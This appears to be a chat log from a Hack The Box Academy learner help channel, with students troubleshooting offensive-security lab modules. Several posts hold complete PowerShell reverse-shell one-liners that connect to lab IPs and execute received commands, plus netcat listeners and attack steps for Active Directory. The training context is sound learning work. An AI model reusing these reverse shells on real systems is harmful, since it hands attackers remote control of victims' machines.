Hey all! I'm having some trouble with the Intro To Python 3 module.... on the last page it has a question about what type of data a specific item is.... but when i use the Type() command in there, and input the result, it tells me that it was wrong.
I've even gone through and input all the data types i can remember to try and identify... but I still cant seem to get it. Any general guidance would be highly beneficial! Still trying to figure this all out
there is book python in amazon 🙂
you can dm me even though I believe you got it right, maybe copy/paste is the problem.
Windows lateral movement, skill assessment
You can DM
r1cky can I dm you?
Sure
The question shows you the expected format of the answer. Be sure to include the full output from your call to type(). If you're still having trouble, show me the code you're using.
oh, apologies, I see someone else offered help
autom4il pointed that out to me haha. I mistakenly had just put in the data type sans the rest of the output.
I do appreciate the follow up though! Amazing to see the community help here!
Can I have a hint on Directory Fuzzing (Module: Attacking Web Applications with Ffuf)?
oh got it 🙂
~~Hey everyone, sorry to bother but could I get a little nudge on these two questions in Windows Privilege Escalation - Pentest in a Nutshell? I feel like I already have all the info I need, with access to the script and some other info being laid out, I'm just wondering if it is purely a wording issue on my end or if I am missing the scope of the question entirely. Thank you all :)
(feel free to dm, appreciated even!)~~
EDIT: managed to solve it, but I would politely ask for better phrasing in these two questions, I spent a while just writing synonyms. Regardless, thank you for the entire team for this awesome community and platform, and hope everyone has an awesome day! :)
Did you get to do this on pwnbox / a vm? Can’t seem to run genymotion on pwnbox
Running a .exe from evil-winrm atm. Does anyone know how to view the .exe's window without RDP access?
PHP Session Poisoning
hey guys, back to this problem again, I finished it anyway but this step still not adding up, has anyone else done this exercise?
http://<SERVER_IP>:<PORT>/index.php?language=session_poisoning
this won't work and not sure if this would be an important step in the CPTS Exam
What's your problem? Sounded like you figured it out
in this exercise (php session poisoning) there are like 4 'simple' steps, but the only one not working or at least showing the same result is this session_poisoning test
https://academy.hackthebox.com/module/23/section/252
What do you expect when you are doing ?language=session_poisoning?
it is supposed to show exactly the value you used as test, and show as result in the page confirming it can be poisoned and then proceed with other steps
the fact that it is not working as shown in the exercise, just wanted to be sure this wont affect the exam
no, that's not how that works
By using ?language=session_poisoning you change the contents of the session file on disk. At this point in time nothing will change on the web page.
The next step includes this session file from disk and then you'll see the string session_poisoning on the page.
There are not really 4 steps. There are just 2. You poison the session file and you include the session file.
ADCS Attacks > Certifried > I can reproduce the attack up to the certipy auth command. Then its always a timeout. Any help would be appreciated
Shells & Payloads - Live engagement > can't find a way to access the manage page for the 1st host ip: 172.16.1.11:8080. Am i supposed to configure the Tor browser settings properly in the xfreerdp session? Can't seem to access the page on my VM
nvm i found it
I'm not surprised by this given the nature of exchange, but glad to see i'm not the only one
It wasn't super bad when I did it, but I unfortunately had to reset it like twice, which sucked because I'd let it sit for 10-15 mins after restarting just to give it time.
Yeah maybe I just need to reset a bit more often and deal with waiting
the shells and payloads module assessment has you access a foothold where you're doing the attacks from; so you can't directly connect to the targets. all of the requisite hosts file stuff is on the target host, which in this instance is acting as a jump host
If you need a sanity check on of a reset is potentially needed, you can DM whenever.
I was getting Powershell out of memory errors running PowerView commands, it's probably a good sign
Ohh
Thank you, i found that trying anything on my actual machine was pretty stupid since the foothold host already has internal access. I was also a big enough dummy to just realize I was using the wrong IP for LHOSTS and finding the firefox browser was as simple as Firefox &.... Thank you for the help though
No
Have you tried: checking command history? 👀
also you'd need to zip the folder to transport everything inside it
otherwise you'd have to grab each file within the folder individually
i think that i need first mut a password list with will user and use hydra to peform a bruteforce in ftp (or ssh) to find a password like how i do to found kira password... i'm correct?
That's a folder not a file, hence the different color. You can transfer folders with scp.
command looks good. it says permission denied. probably kira doesn't have access to will's folder.
Also going to delete your post, please make sure not to post content from modules above tier 0
ok no problem, my bad
will is a secondary user you'll find.
iirc his password isn't in the mut list
it's found in one of the methods displayed from that section
Figured it out. I couldn't find a way to sign the myapp.apk in Android Studio so I used apksigner.... I'll let you figure that part out.
Hey I am doing the AD enumeration and attacks skill assessment and I am having a problem getting powerview to work on the first host. I have an established a meterpreter shell where I used the shell command followed by PowerShell.exe, but when I import the powerview module the cmdlets return an error. I am certain it’s the right binary and thought maybe it was the meterpreter shell so I connected using evil-winrm but that did not fix it
Thanks for this. I just completed this module. Nice subject learning module but oof, resetting these boxes was a pain
Yeah I enjoyed that one.
Does anyone know anyway to get free cubes
okay tks
Hello everyone. Given that this is my first message, is nice to be here with you. I hope that someone can help me :).
I am right now at the lesson Repeating Requests under the module Using Web Proxies. There is an activity to do to find out the second flag using Burp. I can navigate into all the destination server folders modifying the responses in Burp, and even using commands like "find", there is no way to find out the second file "flag.txt". Of course I have searched *fl, *.txt, and many other options together with find command and of course searching in all subdirectories.
Any suggestion about how to get the second flag?
it can be hidden or not shown by the normal user
Hi everyone. Quick question, I am doing the Cross Site Scripting XSS Module but in the Phishing section I cannot get the listening port to work with | php -S 0.0.0.0:80
Any tips?
Hi, can someone tell me how you got the second flag on Skill Assessment Active Directory Trusts Attacks module?
I have tried doing a SID History Injection with a replacement SID for the HR_Management group, but this unfortunately doesn't work and I've been trying to debug this for the second day now, but nothing works
What error are you getting?
Its saying: Failed to listen on 0.0.0.0:80 Reason: Address Already in Use
I did netstat -tuln but did not see the ip and port there
Well the reason seems pretty clear. You could confirm that the address is already in use by issuing an:
sudo ss -lnp
and you should see 0:0:0:0:80 in use. I don't know why that wouldn't show with netstat -tuln
but either way, if port 80 is in use what are your options?
Options will be to change the port to one that is not listening or being used. I did php -S 0.0.0.0:8080 it worked but did not listen when requested the url. Not sure what I am doing wrong.
well, 0.0.0.0 means all interfaces, so if port 80 is being used anywhere else, you won't be able to use port 80 at all. Your first one should work, a different port.
What are you on, XSS? You can DM me with what you're trying. I helped somewhere in that module yesterday so I think I still have it open & can spin things up.
That has put me on pause for a week now. Keep going at it but sadly still stuck. Even tried using google dorks for references
Can anyone give a hint on the last question of ADCS Attack Skills Assessment?
Which word list should I use to get the result in this exercise: "Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag." I'm using ZAP instead of Burp for obvious reasons, but after trying big.txt or common.txt I didn't get any good results.
does anyone have any useful documentation or resources on the basic steps to go about pentesting? I just started the Pentesting job path and am struggling to find the flag for the public exploits section. i find the information in the modules is very good but im getting a bit stuck putting some steps together and finding some steps are missing that i need to understand fully.
I like the file, word and directory lists from seclists: /usr/share/seclists/Discovery/Web-Content/
I can't say which you should use, but I'd be surprised if at least one of those didn't work.
can you give me larger word lists. I used seclists common.txt and big.txt but none of them found the right solution.
yes, look for 'large' in the filenames.
forgot what it's called but there is one of them that has a name like directory-list-1.0
the smallest one is big enough
okay, I'll try that
large can be overkill, but I looked at the directory, the ones I like are raft-[small|medium|large]-[files|directories|words].txt directory-list-1.0 in there too.
Okay found it. Thanks for the help
i need help with Exploiting SQLi via WebSockets
good afternoon, can anyone tell me why the cubes in the academy come out in negative, -182 cubes.
what. negative cubes?
yes
can you send a screencap
wtf?
Need some help? Learn how to reach the support team on Academy.
ask support i have no clue
SQLMap Essentials > Building Attacks > Attack Tuning
- Question: What's the contents of table flag5? (Case #5)
- Command Craft:
sqlmap -u 'http://redactedip.com/case5.php?id=1' --level=5 --risk=3 -T flag5 --technique B --dump --batch -v 3 --no-cast
Having an issue getting the proper flag, I have found another one replacing it with "muc!_..." but still no go. Any idea what I'm messing up on?
The hint says to run the command a few times to ensure it's correct, I've ran it and no longer getting anything different than what I've got
currently doing the Shells and Payloads module on the bind shell part, i’ve created a bind shell on the target and i’ve connected on my attack host, however i can’t change directory or anything once in the bind shell to get the flag? if i input the directory its located it just doesn’t do anything
Do you have my module complete? I'll look at my notes for ya
don’t worry my mistake, was missing a part of the command at the end
Have you done SQLMap Essentials (Basic Toolset > Skill path)?
I have not - i’m currently like 28% through CPTS
Goodluck with your journey 🙂 I took a break at 60% and went to the Skill Paths for a bit
It gets hard at AD & Enumeration I'd say
If you're still stuck on this I won't give you the answer, but you can DM.
I'm new to hack the box. I'm having a heck of a time getting the shell to accept my password. Sometimes I can get in and sometimes I can't. I don't see anywhere where it says the password might change from time to time. I'm working on the intro to the cmd line module, so very basic stuff. I don't understand why the instance will not accept my password. Can anyone help? Also, because I am at the intro course, and I can't seem to get the instance to accept my password, as a consequence I can't figure out if we're supposed to be running the command as we go thru the course. For example, like on the powershell section are we supposed to install the AD module as we move along?
Looking for help on Footprinting, DNS section, Q4 finding host with last octet .203. Been at it for 2 days. Different word lists, dig switches, and dnsenum… I’m lost. Anyone got help beyond “dig deeper” or “different word list?”
not to say you are but I know I kept missing it in the list of ips when doing that one. and had to make my eyes read each ip address to find the 203. for some reason the way the formatting was I kept skipping that one ip address.
also do a search on this forum for a lot of the module questions. I have found it also helpful.
https://forum.hackthebox.com/t/what-is-the-fqdn-of-the-host-where-the-last-octet-ends-with-x-x-x-203-i-dont-know-what-do-anymore/273242
if that link doesn't help also do a search for dns .203 etc check each post and replies
i used first: for sub in $(cat /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt );do dig $sub.inlanefreight.htb @10.129.169.32 | grep -v ‘;|SOA’ | sed -r ‘/^\s*$/d’ | grep $sub | tee -a subdomains.txt;done ns.inlanefreight.htb. 604800 IN A 127.0.0.1 mail1.inlanefreight.htb. 604800 IN A 10.1...
What is the command you're putting to ssh in?
hi currently doing the network enumeration with nmap module, Firewall and IDS/IPS Evasion - Easy Lab
And I have found the flag but when I paste it in, it does not seem to accept it. It is the typical HTB{key blah blah} and for some reason htb doesnt like it?
Can anyone help or should I restart the target?
As the person who just opened and started reading the very first module i can not help you
The question is different on the easy lab i believe
omg i didnt even read the question lol im assuming i found the harder answers mb lol
Hahah thought so
Wait lab difficulty is based upon luck
no but some of the questions are harder in the same lab. step 1 ssh to this box. get flag. then sql to this get flag... you find the sql flag thinking it is the one for the ssh
Anyone else having issues with logrotten section on Linux Priv Esc
pain in the ass I saw this for a millisecond: └──╼ [★]$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.15.225] from (UNKNOWN) [10.129.79.6] 42534
root@ubuntu:~# and then it closed quickly. now everytime I run the command, it never works again....
my box for reverse shell is done. can't even ping it anymore. tried refresh .. ;-/
same don't work
thanks for the advice. I’ll give it a try and I’ll def check the link. I’m running outputs through GPT just to double check if I missed it.
that is the no longer active htb forum link
Can anyone help guide me on the reverse shell lab?
I rdp to the desktop of the windows box. Disabled anti-virus.
copy pasted the command into powershell (admin) and (non-admin) and it throws a syntax error.
not asking for help on the lab. just wondering why if it is directly from the lab as a command it is throwing a syntax error.
Can you show how you input the command?
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.43',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = (
that was copy and pasted directly from the lab.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
First one missed a part yes. The second one should work.
just repasted and verified it had full paste. still got same error. like it is missing a " or a ' somewhere.
Which module is and section?
here is a copy from the screen with full command
I also tried the 3 listed as reverse shell cheat sheet under powershell that was referenced in the lab.
swisskyrepo.github.io
ok
tried c:\users\public (current directory)
same error
use CMD instead of PowerShell, to add more context it does not like some chars and you can always make the payload base64 and then use it directly PowerShell. The alternative is to find a way to not mess with some special chars and do some escape.
ugh.. ok will try that
that worked. ran from cmd
so trying to understand if it is a powershell command. shouldn't I have been able to remove the "powershell" part and then run it in powershell directly?
its still powershell, your command start with powershell meaning it will run in powershell
yea but when I ran it in powershell putting in the command it flagged the error. it only worked (thank you by the way) in cmd.exe
not understanding why it failed in powershell if it is a powershell command
you run powershell in cmd.exe
what if I took out the word powershell and ran the rest of the command in powershell cli? why would it fail then?
and thank you very much for that help. was bashing my head on this all day.
Yo guys somebud help
Im on password attacks
Linux pass the ticket thing
I cant connect the pwnbox to the AD network
I can't connect to the server via SSH from my VM. This is for the SOCKS5 Tunneling with Chisel section of Pivoting, Tunneling, and Port Forwarding module:
──(kali㉿kali)-[~/chisel]
└─$ scp chisel ubuntu@10.129.91.21:~/
ssh: connect to host 10.129.91.21 port 22: No route to host
scp: Connection closed
┌──(kali㉿kali)-[~/chisel]
└─$ scp chisel ubuntu@10.129.91.21
┌──(kali㉿kali)-[~/chisel]
└─$ ssh ubuntu@10.129.91.21
ssh: connect to host 10.129.91.21 port 22: No route to host
Hopefully this doesn't spoil too much. I downloaded the recommended VPN file.
Ive followed everything correctly
Bro we are having the same problem at the same time 
maybe its not me then
No but here its used with -nop. You can always let chatgpt fix syntax, so it will work
powershell -nop -c "`$client = New-Object System.Net.Sockets.TCPClient('10.10.14.169',443);`$stream = `$client.GetStream();[byte[]]`$bytes = 0..65535|%{0};while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0){;`$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i);`$sendback = (iex `$data 2>&1 | Out-String );`$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> ';`$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2);`$stream.Write(`$sendbyte,0,`$sendbyte.Length);`$stream.Flush()};`$client.Close()"
Mine is optional question so maybe i can just 
mine is not an optional question. but maybe its something with academy
But what if similar situation happens during cpts 
then they probably will give you a new voucher
I meant
If i skipped this thing and didnt learn the skill
2 full days on 1 section come ooooon
then maybe don't skip
Coooorect
right ok
So whos gonna help us now
I mean I know a guy who was helping me on the section I'm on
I can ask if he can help you too
I can help, its pivotting?
(not this particular problem but on section in general)
Mine is password attacks but yeah same problem
Okay dm?
Hey I need some help with an account issue caused by the merge/SSO thing. I no longer have access to any of the modules I paid for and I've lost basically everything lol. Who can I talk to?
you can talk to support
Need some help? Learn how to reach the support team on Academy.
ok so now I can connect to the ssh server and upload the file but it won't let me run the hacking tool it tells me to run on the SSH server. like the instructions to build it won't work. can someone help me with this? This is for SOCKS5 Tunneling with Chisel section of Pivoting, Tunneling, and Port Forwarding module
I tried the version of chisel used in the instructions and it didn't work. I tried a different version of chisel it still didn't work.
ubuntu@WEB01:~/chisel-1.10.1$ ls
build client example go.mod go.sum LICENSE main.go Makefile README.md server share test
ubuntu@WEB01:~/chisel-1.10.1$ cd ..
ubuntu@WEB01:~$ ls
chisel-1.10.1 chisel_1.10.1_linux_386.deb chisel-1.10.1.tar.gz chisel-1.10.1.zip
ubuntu@WEB01:~$ cd chisel-1.10.1/
ubuntu@WEB01:~/chisel-1.10.1$ ls
build client example go.mod go.sum LICENSE main.go Makefile README.md server share test
ubuntu@WEB01:~/chisel-1.10.1$ cd ..
ubuntu@WEB01:~$ ./main.go
-bash: ./main.go: No such file or directory
ubuntu@WEB01:~$ cd chisel-1.10.1/
ubuntu@WEB01:~/chisel-1.10.1$ ls
build client example go.mod go.sum LICENSE main.go Makefile README.md server share test
ubuntu@WEB01:~/chisel-1.10.1$ ./main.go
-bash: ./main.go: Permission denied
ubuntu@WEB01:~/chisel-1.10.1$ sudo ./main.go
sudo: ./main.go: command not found
ubuntu@WEB01:~/chisel-1.10.1$ chmod +x Makefile
ubuntu@WEB01:~/chisel-1.10.1$ Makefile
Makefile: command not found
go build
or
go install github.com/jpillora/chisel@latest
alternatively, download the latest release
the instructions for building the binary are in the section.
I think go is not installed on the Ubuntu server and it won't let me install go
but someone else is helping me so I'll try what you're saying again after I see if what they tell me works
customerops@hackthebox right? Sent an email but wanted to make sure that was correct.
Just hoping that all the stuff I paid for isn't lost forever since I've been paying for awhile and was working on my CPTS track
yes. though i am not HTB staff so i won't be of much assistance
No worries. I'm just a bit frustrated is all 😅
I did send the email but I'm just hoping everything I paid for isn't gone and my progress isn't gone x.x
ok I completed the section
Anyone completed Android Static analysis? need help
Even I'm stuck here even with the right debug pwd it shows invalid creds
Hi everyone. Question on the lab for Active Directory Enumeration & Attacks Kerberoasting - from Windows. I keep getting an empty file when trying to create the hashcat file.
I did the following:
- Prepared the Base64 for cracking (echo "<base64 blob>" | tr -d \n )
I was able to place the output into a kirbi file from (cat encoded_file | base64 -d > vmware.kirbi)
But when I'm extracting the ticket using the kirbi2john.py from "https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py", the crack_file is blank.
I'm trying to replicate, but now when I'm running cat hash2 | base64 --decode > vmware.kirbi, I get a "base64: invalid input" error
Are you escaping the \n in your tr command?
echo <base64 blob> | tr -d \\n
Make sure you don't accidentally have a line feed in the encoded_file from when you pasted into the file from your output.
Without quotes will work if you are escaping with the double backslash
\\n will work
"\n" will work
Hey, did someone finish the skill assessment in the module "Lateral Movement"? I think there is an issue with the lab at the second last flag
Ah. Trying that now
You can DM what you think the issue is and I can tell you if it is or not a lab issue.
I just tried again. When I tried to make the crack_file, it's coming up with no data
Check to see if you can just run kirbi2john
Hi! Yes, I can run it. I don't get an error, but when I check for the crack_file, the size is still 0
Did it print the output to the screen?
Yeah on my pc kirbi2john just outputs the result.
No. there was no output. Just a new prompt
Don't use python kirbi2john.py just try kirbi2john then the name of your file.
If that prints the output, try to simply copy/paste the output into a file, call it crack_file if you want and first try it with hashcat, as i believe it might already be formatted. If not, follow the section guidance on using sed, then try it again with hashcat.
If none of that works, I'll check it out when I'm on my pc later.
Awesome sauce. Many thanks!
Here's where I'm currently at
I think he means just
kirbi2john no .py
Cool. I will try that as well
Excelsior!
That worked. Was racking my brain for hours. Many thanks!
The crack_file is still showing up as 0 bytes. Can I just use the output from kirbi2john?
Did you get output in your terminal after the kirbi2john?
You'd put that data into crack_file then run sed against it
I was able to successfully crack it. Ok. I didn't put the data in the crack_file though. I didn't think to do that
I guess format was already good 👍
That sed command just makes sure the output hash from kirbi2john.py is formatted for hashcat.
I haven't used the Python tool. I just have the pre installed one on my parrot box
Quick sanity check: after dumping ntds which hashcat modes would you use to crack these hash versions? aes256-cts-hmac-sha1-96, aes128-cts-hmac-sha1-96, des-cbc-md5. I'm 99% sure I'm using the correct modules but would like to be sure
I think maybe 19600 and 18200?
Has Parrot OS been easier for you as opposed to Kali? Asking because I haven't used that OS yet.
Thanks, the format of my hashes must be incompatible with hashcat or something
I switched from Kali a couple years ago.
I've liked parrot so far and I have no real reason to go back to Kali. I feel like Kali does have more tools out of the box.
I have my parrot setup with everything I need so I don't really feel like switching now haha. Especially over the years adding more tools. I also started using Ansible to easily setup my VMs (thank you ippsec)
I got a question too.
So I am currently doing some review before CAPE and noticed something that confused me in the ADCS Attacks module.
In the PKINIT section, under "RBCD - Attacking using passTheCert" why is the module saying that we are requesting the Administrator TGT?
To me it looks like we used passTheCert to add our computer on our target's AllowedToActOnBehalfOfOtherIdentity property so we can use RBCD and S4U2Proxy to request a cifs service ticket impersonating the Administrator for the target. Not requesting the Admin's TGT. Right?
That is very insightful. I'll check that OS out. Many thanks again!
I'm going to reread the section I must be missing something
Yeah I worked through the question again doing RBCD and got a cifs service ticket. Not a TGT.
We only get a TGT for our machine account so we can do S4U2Proxy and request a service ticket impersonating administrator.
just want to make sure i'm not hallucinating after doing the AD modules... ExtraSIDs and SIDHistory Injection are 2 completely different attacks right? their only similarity is they both involve account's SID history attribute?
ExtraSIDs is achieved by assigning arbitrary SIDs while forging a golden ticket in a parent domain
SIDHistory Injection is about assigning an unresolvable SID of a deleted user to a different account's SIDHistory thereby impersonating the ACLs of the unresolved SIDs?
They are totally separate attacks. They do not both involve the SID history attribute. ExtraSIDs abuses the extraSIDs field in a Kerberos ticket while SIDHistory Injection abuses the SIDHistory LDAP attribute in AD.
thanks for clarifying
@ionic crater Please take care not to post spoilers from modules above tier 0, especially skill assessments.
Oh, sorry, it won't happen again. I will read the rule carefully
im writing report for AEN, i got a question, in host & service discovery section which way is more preferable?
I'd strongly recommend simply using the suggested template HTB provides with sysreptr.
It's sysreptor, just confused which would be better way to fill in the hosts/ports...
can make it look exactly the same
damn thanks, this looks interesting
is drupalgeddon3 removed from msfconsole?
can anyone help me with the "Web Attacks - Skills Assessment" i tried everything now
which question?
to find the /flag.php
hi can anybody please help me im stuck at it since 4 days idk what to do,,, im not able to access student offer of 8$ i tried everything i even submitted a ticket yet i have no idea now what to do can somebody please help me
to find the /flag.php
dm
anyone?
What's the difference between one-server and client server? The diagrams look the same and the description doesn't seem to differentiate/state a lot about them. I have a good knowledge regarding webapps in general
password mutation module is a bit weird, why direct people to brute force a specific port but then have the answers point to directing the brute force over an alternative service. seems a bit dumb
also putting the correct 'guess' over 9000 entries into a generated wordlist on a brute force limited to 120ish guesses a min is diabolical work
hahhaahha thats not the index number dude
I got a different number, did you cd to the etc dir then stat sudoers?
I dont know if it makes a difference but i didnt "stat /etc/sudoers"
Windows Privilege Escalation Skills Assessment - Part I
Can anyone tell me where i am making a mistake
nc.exe giving shell back when run normally, but when run with "juicypotato" it's not giving any response.
oh then what is?
cd to the etc and then to dir?
i just started and im a self learner, im really at 0 rn, trying my best to go up slowly
When you grabbed juicypotato did it include a powershell script that you could run?
man i cannot provide answer to modules im sorry
no not the answer, the explanation, how do i find index number or in what category that is, what commands or even what is index number about, stuff like that
where do i find step by step instructions for the academy thats not locked behind a paywall?
you shouldnt u should just do research how things work tbh
No sorry, dir is short for directory. If you cd to etc/ then "stat sudoers" is the number the same?
ohh, yea it's still the same
Interesting, i used the inode number for that question and it was correct
ok so im paying a monthly sub to use a VM... got it.
oh so the index number is the same as inode
Yes
maybe you're at the wrong section?
that's weird, how am i supposed to do this then? any suggestions?
what do you mean at the wrong section?
think about that index
You could try resetting the target and repeating the steps you took
are you referring the VM like this one?
that's what im doing...
ah okay!
Good luck, failing that I'm not sure what else to do, maybe contact support.... i dont know if the numbers are the same for you and me but the inode number for me had 6 digits
I have been trying to work through the Linux module and I got to the module on using the "find" command and nothing I do returns the information I need for the first question, and the step-by-step walkthrough is reserved for those worthy souls that have a yearly subscription not us peasants that pay monthly.
noted, thank you for the help!
You could use the forums
Or good ol google
ChatGPT couldn't even figure it out
like i said, im paying HTB just to use their VM.
What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
Target(s): 10.129.57.134 (ACADEMY-NIXFUND)
I understand your frustration, but complaining about it in here isn't going to change anything. I for one don't have access to step-by-step walk throughs and prefer it that way. I'm not sure which module/section you're working on, but odds are someone else has encountered a similar issue. First keyword searching this channel can help identify previous related questions and potential information that can help you. I'd always start there first.
ok I want you to imagine going to firefighter "Academy" and on day one you walk in and they hand you a test and say "figure it out, and if you get stuck pay us more money."
Did you read through the module and try yourself sections? HTB requires a lot of reading and researching, practicing from our ends too.
yo relax my dude
skill issue
Like I said try the search function and see if that helps. If not, you can DM what you are trying.
no crap, the whole point of paying for the Academy is to learn the skill... my dude
Are you telling the system to ignore the errors in your command?
knowing how to solve problems is also considered a "skill" my brother
nobody know anything but they try
yeah and everything still comes back "permission denied"
dming
Could you provide us with the exact command you used?
Also are you running the command while ssh'd into the target?
Yo guys can someone help me out with this?
find . -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 2>/dev/null
and yeah im ssh in
i cant post screenshots
get identified, instructions #welcome, then you'll have screenshot permissions
Maybe change the . To a /
oh ok thx
i think when u put . it searches the current directory
but / is the entire system
ok that helped some, it finally gave me an output! thank you. However, its telling me thats the wrong answer...
show the screenshot maybe ?
when u do this 2</dev/null this redirects the errors to dev/null
Deleted the image cos it contains the answer, try just the file name, not the whole directory.
@west iris ^
thank you
Also for future reference, before asking a question please use the search function to search for similar questions in this channel. Your question has actually been asked a lot
Anyone can help #starting-point ?
not the place to ask
one quick question before i go, has anyone here actually got a job doing anything in cybersecurity after going through this? i know its off topic, just curious.
I have seen some people get jobs out of this although i dont know them in rl so i cannot confirm or deny
I can say there is a difference in folks who I've interviewed with HTB academy knowledge/certs compared to those that don't. I've also noticed a significant difference in our junior pentesters who are going through the path.
One thing i can say, going through the academy i am definitely learning stuff
so even tho the content/training is "gamified" you as an interviewer think it is effective?
Problem solving, methodology, process, etc.
not the right question dude ur mindset should just be improving everyday
i get that, but i was just curious
i got an internship after 3 certs, but having the certs didn't help so much. (sysadm)
so you think you got the job bc you knew what you were doing not necessarily because you had a printed cert?
pretty much. they were more interested in my projects. no reason to care so much about my certs when they show that i can do some things unrelated to the role
yeah that makes sense. what kind of projects did you do?
helpful to know that certs don't guarantee job offers, they just show that you can do a specific thing. but if a job posting lists it, then it's good to have on your resume
certs with projects to back them = max value
stuff related to sysadm from some of my college courses, and an old homelab which wasn't on my resume but i brought it up during the interview
they were cyber-related since i am a cyber student, but nothing really tied back to my certs. just had them on there to show that i was learning outside of college
CSS preview on Web Applications module doesn't seem to load. Is it an issue on my side?
If anything it’s the OSCP unfortunately that gets you some opportunities
Windows privilege escalation -> Pillaging
Hello, I am stuck at last question. After restoring the files, I have dumped the SAM hashes for local users, including Administrator's, but the answer is not accepted. I've tried different formats (nthash, lmhash:nthash, Administrator:nthash ...) but nothing works.
I'd look at dates associated with what you are restoring.
Thanks, got it 💪
On the Abusing HTTP Misconfigurations Skills Assessment - Hard, I've poisoned the cache and when I visit the page the admin is supposed to visit my js code runs and I get a request to the promote link in burp. So why is the admin not running my code?
Hiii guys, im trying to do the Nessus Skills Assessment module, and trying to connect to nessus scan via vpn, but it doesn't seem to reach the host, changed several targets still doesnt work, was wondering if its an issue on the server side? tried to ping it but its not responding either
or is it not accessible externally, do i have to do it via pwnbox?
You should be able to VPN in and access it via the browser.
Anyone did the Android Application Static Analysis? Would like to ask some questions on the reading obfs part
huh interesting i can do it via pwnbox but not vpn
with the exact same url it worked in my pwnbox but not via vpn(with vpn on)
Hey guys. I have the following problem: when i add domain to etc/hosts and try to reach it through browser - i see this page. However when i try to reach domain using curl then everything is good. Why this thing happens when i use browser?
although i havent done that module, but i assume you are using squid for your browser as proxy
that would not resolve that DNS if you modified /etc/hosts
I can't login to academy it thinks i'm a bot, any solution ?
I used 2 different browsers.
Hello !
In the Attacking Common Services module, I am doing the FTP part. I started this morning, did the nmap, found the FTP port.
I had to go do something and am now back. I spawn a new target this afternoon, which does not have the FTP port open (port that I identified this morning). I relaunched 2 times the target machine but still the nmap scan indicates that the port is closed.
How can I fix that ?
i deleted all firefox profiles using firefox --ProfileManager and created a new one. it helped.
thanks for the info, but that didn't help.
does anyone know how to login to htb academy without them thinking i'm a bot ? help would be greatly appreciated. I emailed cutomerops@hackthebox.com.
Try again with -Pn ?
Already did 😦
Only support can help you, this server is for module questions
I even did -p<port> and it showed as closed
anyone having issues starting up their targets this morning? been trying for a bit now
I'm trying to spawn a new target but i'm stuck on Target is spawning for the past 15 minutes
lol
No yeah lol
ok isnt just me
If u check my messages above, i'm not sure the correct targets are spawning xD
This one
You sure you checked for a correct port? FTP may run on an uncommon port too.
I did the nmap this morning which identified the port (I answered the question in the HTB academy and got the correct answer). Re-running the same nmap scan does not provide the same result and the port (that is the answer) is showed as closed
So idk :/
Then I can't help, sorry, you can raise an issue with support about target not spawning properly
Ok thank you still !
I'm gonna go forward with the course and come back later, hopefully these issues will have been fixed by tonight / tomorrow
anyone that I can ask personally about modules?
any one give me a hand with "Android Application Static Analysis" the first task, install the app, launch it and configure the ip and port. what ip and port number? it doesnt seem to matter what i set them to i still cant Install the app?
Anyone else's machines stuck in an infinite "target spawning" loop?
i searched for a similar question before asking here but couldn’t find the correct answer. Is there anyone I can refer to for help?
I just told Support via the website for anyone with target spawning issues
dm I'll try to answer best I can
ok
Active Directory LDAP
anonymous bind section target do not spawn, anyone have same issue?
Looks like its an issue, seen several people experiencing this
On different modules though
not bad for the first day of a platinum subscription 🤣 🤣
same :/
anybody having trouble spawning machines inside the modules?
awful experience from HTB Academy lately
stuck on spawning...
ah i just saw, sorry
Active Directory Enumeration & Attacks - Attacking Domain Trusts - Child -> Parent Trusts - from Linux - the command under Grabbing the Domain SID & Attaching to Enterprise Admin's RID doesn't return the parent Domain SID
Anyone else having issues with the modules loading?
Targets arent spawning for me
I’m down here I’m on EST server tried Uk tried Canada
Ah I just got a pop
Up
Issues with targets and boxes
when you start the target you only get an IP address to one domain controller so you have to basically reuse the Child Domain SID, Child Domain SID and get the krbtgt hash.
Check academy dash board
I am connected to pwnbox and have a target started but it buggy
We all got issues all good
I’ll just touch some grass
Or imma chill w my side chick THM
Hello,
I'm currently working on the File Inclusion module, specifically the Log Poisoning section. However, the machine isn't spawning, and I've been waiting for about two hours. Could you please let me know if there's an issue with this machine?
Support responded they are aware of it. It's a third-party issue.
Someone pin this post lol
Is anyone elses targets not spawning / hanging?
or they should make an announcement maybe? 
Thanks!
I'm trying to do the first lab about SSTI, and I've been waiting for the lab to spawn for about 30 mins - does anyone have any guidance on troubleshooting techniques?
oh, it's already been reported
mb
Im on this boat too
Can someone @ me when the issue seems to be resolved? Thanks in advance!
Same issue
same issue
Howdy! I need a hint for the last step on the module Windows lateral movement SA. I need the flag on the DC. I can explain what I got so far in a pm. 🙏
You need to set up proxy, then to check Firefox via VNC
Or wouldnt it be nice if they just made an announcement bc everyone wants to know when its resolved lol
I already got the vnc connection
Then check browser
True, not sure if they do that usually so thats why I asked.
Im just saying, I think it would be courteous of them and best practice
I dont think VNC is the way to the DC here
its back babyyyyy @foggy snow
It still doesn't seem to be back for me 😭
same for me
It's just loaded, but it's taken 20-25 mins to get to this stage.
Same shit
spawning target works for me
